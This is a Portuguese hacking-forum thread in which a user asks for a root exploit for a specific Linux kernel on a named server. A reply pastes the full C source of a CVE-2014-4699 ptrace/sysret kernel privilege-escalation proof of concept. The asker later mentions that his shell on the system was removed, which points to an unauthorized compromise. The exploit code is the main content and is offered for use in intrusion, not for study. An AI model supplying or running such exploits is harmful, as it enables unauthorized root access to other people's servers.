Bem-vindo(a) ao Fórum do Guia do Hacker.
Guia do Hacker - Seu Guia Completo de Informação Digital

Fórum do Guia do Hacker » Segurança Digital e Hacking » Área Hacker » Dúvidas » Exploit para obter o acesso root

Dúvidas Área para postagens de dúvidas.

Tópicos Similares
Tópico Tópico Iniciado Por Fórum Respostas Última Mensagem
Obter acesso a pastas de acesso negado tingolingo3 Dúvidas 0 15-02-2013 12:00
Dica Exploit para obter senha de acesso WAP e WEP felipedasi Matérias/Tutoriais/Dicas 2 19-05-2012 20:08
[Ajuda] Para obter acesso a pagina do adm Aprendiz__ Defacer 12 24-02-2012 16:13
Dica Exploit no kernel 2.6 do Linux permite acesso de root para usuário local Bhior Matérias/Tutoriais/Dicas 8 29-06-2011 01:18
Dica Tenho alguns sites em RFI como faço para obter acesso via terminal? xvai0 Matérias/Tutoriais/Dicas 2 31-01-2010 15:30

Resposta
Ferramentas do Tópico vBmenu Seperating Image Modos de Exibição vBmenu Seperating Image
Exploit para obter o acesso root
Antigo 04-08-2014, 19:51   #1
hard2k-
Membro
 
Avatar de hard2k-
 
Status: Membro
Registrado em: Jul 2014
Localização: Atrás de vc ,BU.
Posts: 12
Agradeceu: 0
Agradecido 0 Vezes em 0 Posts
hard2k- é um desconhecido na estrada
Exclamation Exploit para obter o acesso root

Algum pode me disponibilizar o exploit para o seguinte kernel ?ele é privado?

Linux mccartney.hmnoc.net 2.6.32-531.1.2.lve1.2.54.el6.x86_64 #1 SMP Tue Mar 25 07:41:27 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux



Notice: This Ad only show to guest, please register now to disappear !
hard2k- está offline   Responder com Citação
Links Patrocinados
Antigo 07-08-2014, 22:51   #2
wahooka
Membro
 
Avatar de wahooka
 
Status: Membro
Registrado em: Apr 2010
Localização: sp
Posts: 54
Agradeceu: 2
Agradecido 22 Vezes em 17 Posts
wahooka é um desconhecido na estrada
Padrão

nada que uma pesquisada no google não resolva.

cve-2014-4699

Código:
/**
 * CVE-2014-4699 ptrace/sysret PoC
 * by Vitaly Nikolenko
 * vnik@hashcrack.org
 *
 * > gcc -O2 poc_v0.c
 *
 * This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the
 * following will trigger the #GP in sysret and overwrite the #PF handler so we
 * can land to our NOP sled mapped at 0x80000000.
 * However, once landed, the IDT will be trashed. We can either attempt to
 * restore it (then escalate privileges and execute our shellcode) or find
 * something else to overwrite that would transfer exec flow to our controlled
 * user-space address. Since 3.10.something, IDT is read-only anyway. If you
 * have any ideas, let me know.
 */
  
#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <unistd.h>
#include <sys/mman.h>
#include <errno.h>
 
#define SIZE  0x10000000
 
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
 
unsigned long __user_cs;
unsigned long __user_ss;
unsigned long __user_rflags;
 
void __attribute__((regparm(3))) payload() {
    uint32_t *fixptr = (void*)0xffffffff81dd70e8;
    // restore the #PF handler
    *fixptr = -1;
    //commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;
    //prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;
    //commit_creds(prepare_kernel_cred((uint64_t)NULL));
 
    //__asm__ volatile ("swapgs\n\t"
    //        "...");
}
 
int main() {
    struct user_regs_struct regs;
    uint8_t *trampoline, *tmp;
    int status;
 
    struct {
        uint16_t limit;
        uint64_t addr;
    } __attribute__((packed)) idt;
 
        // MAP_POPULATE so we don't trigger extra #PF
    trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
    assert(trampoline == 0x80000000);
    memset(trampoline, 0x90, SIZE);
        tmp = trampoline;
        tmp += SIZE-1024;
        memcpy(tmp, &payload, 1024);
    memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
 
    pid_t chld;
 
        if ((chld = fork()) < 0) {
        perror("fork");
        exit(1);
    }
     
    if (chld == 0) {
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
            perror("PTRACE_TRACEME");
            exit(1);
        }
        raise(SIGSTOP);
        fork();
        return 0;
    }
 
    asm volatile("sidt %0" : "=m" (idt));
    printf("IDT addr = 0x%lx\n", idt.addr);
 
    waitpid(chld, &status, 0);
 
    ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
 
    ptrace(PTRACE_CONT, chld, 0, 0);
 
    waitpid(chld, &status, 0);
 
        ptrace(PTRACE_GETREGS, chld, NULL, &regs);
    regs.rdi = 0x0000000000000000;
    regs.rip = 0x8fffffffffffffff;
    regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;
 
    // attempt to restore the IDT
    regs.rdi = 0x0000000000000000;
    regs.rsi = 0x81658e000010cbd0;
    regs.rdx = 0x00000000ffffffff;
    regs.rcx = 0x81658e000010cba0;
    regs.rax = 0x00000000ffffffff;
    regs.r8  = 0x81658e010010cb00;
    regs.r9  = 0x00000000ffffffff;
    regs.r10 = 0x81668e0000106b10;
    regs.r11 = 0x00000000ffffffff;
    regs.rbx = 0x81668e0000106ac0;
    regs.rbp = 0x00000000ffffffff;
    regs.r12 = 0x81668e0000106ac0;
    regs.r13 = 0x00000000ffffffff;
    regs.r14 = 0x81668e0200106a90;
    regs.r15 = 0x00000000ffffffff;
 
        ptrace(PTRACE_SETREGS, chld, NULL, &regs);
 
    ptrace(PTRACE_CONT, chld, 0, 0);
 
    ptrace(PTRACE_DETACH, chld, 0, 0);
}



Notice: This Ad only show to guest, please register now to disappear !
wahooka está offline   Responder com Citação
O seguinte Usuário Agradeceu (a): wahooka por gostar desta postagem:
Strauji (12-06-2015)
Antigo 09-08-2014, 18:14   #3
hard2k-
Membro
 
Avatar de hard2k-
 
Status: Membro
Registrado em: Jul 2014
Localização: Atrás de vc ,BU.
Posts: 12
Agradeceu: 0
Agradecido 0 Vezes em 0 Posts
hard2k- é um desconhecido na estrada
Padrão

Pesquisei não achei, o nosso amigo n4sss falou que era priv8 só rolava com os caras mais underground :/ ,já tiraram a shell do sistema,mais vlw ^^



Notice: This Ad only show to guest, please register now to disappear !
hard2k- está offline   Responder com Citação
Resposta

Ferramentas do Tópico
Modos de Exibição

Regras para Posts
Você não pode postar novos tópicos
Você não pode postar respostas
Você não pode postar anexos
Você não pode editar seus posts

Código [IMG] Sim
Código HTML Não

Ir para...


 

Horários baseados na GMT -3. Agora são 18:24.


Please enable / Bitte aktiviere JavaScript!
Veuillez activer / Por favor activa el Javascript![ ? ]